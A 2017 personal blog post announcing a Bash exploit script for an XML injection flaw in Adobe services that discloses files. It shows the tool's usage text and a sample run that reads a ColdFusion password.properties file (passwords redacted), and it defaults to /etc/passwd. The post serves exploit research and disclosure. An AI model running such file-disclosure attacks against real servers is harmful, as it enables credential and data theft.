I've written my first exploit tool: XML injection in Adobe services leads to file disclosure

2017-04-07 21:35:00

Today I spent a few hours learning how to manually perform the actions that one would otherwise do with Metasploit's "auxiliary:scanner:adobe_xml_inject".

I built a standalone Bash script that uses Curl to submit the XML file to the vulnerable Adobe service(s), so the desired files can be read. Basically, it’s the Bash implementation of Exploit-DB’s multiple/dos/11529.txt (which is a PoC / paper). 

I've submitted this script to Offensive Security and I hope they'll consider adding it to their collection! The script is currently available from my GitHub repository -> adobe_xml_inject.sh

I'm darn happy with how the script turned out! I couldn't have made it this quickly without the valuable experience I've built at $PREVCLIENT, using Curl to work with the Nexpose and PingFederate APIs. 

EDIT: And it's up on Exploit-DB!

Here's a little show of what the script does!

root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -?

        adobe_xml_inject.sh [-?] [-d] [-s] [-b] -h host [-p port] [-f file]

	   -?   Show this help message.
	   -d   Debug mode, outputs more kruft on stdout.
	   -s   Use SSL / HTTPS, instead of HTTP.
	   -b	Break on the first valid answer found.
	   -h	Target host
	   -p	Target port, defaults to 8400.
	   -f	Full path to file to grab, defaults to /etc/passwd.

	This script exploits a known vulnerability in a set of Adobe applications. Using one 
	of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is
	normally inaccessible. 

	NOTE: Windows paths use \, so be sure to properly escape them when using -f! For example:
	adobe_xml_inject.sh -h -f c:\\coldfusion8\\lib\\password.properties
	adobe_xml_inject.sh -h -f 'c:\coldfusion8\lib\password.properties'

	This script relies on CURL, so please have it in your PATH. 

root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -h -p 80 -f 'c:\coldfusion8\lib\password.properties'
INFO 200 for
INFO 200 for
Read from
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl"><string>;jsessionid=f030d168c640a7d02d4036a3d3b7e4c35783</string></header>
<body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits>
<string>#Fri Sep 23 18:27:15 PDT 2011
rdspassword=< redacted >
password=< redacted >
INFO 500 for
INFO 200 for
INFO 500 for
INFO 500 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for
INFO 404 for

kilala.nl tags: , , ,

View or add comments (curr. 0)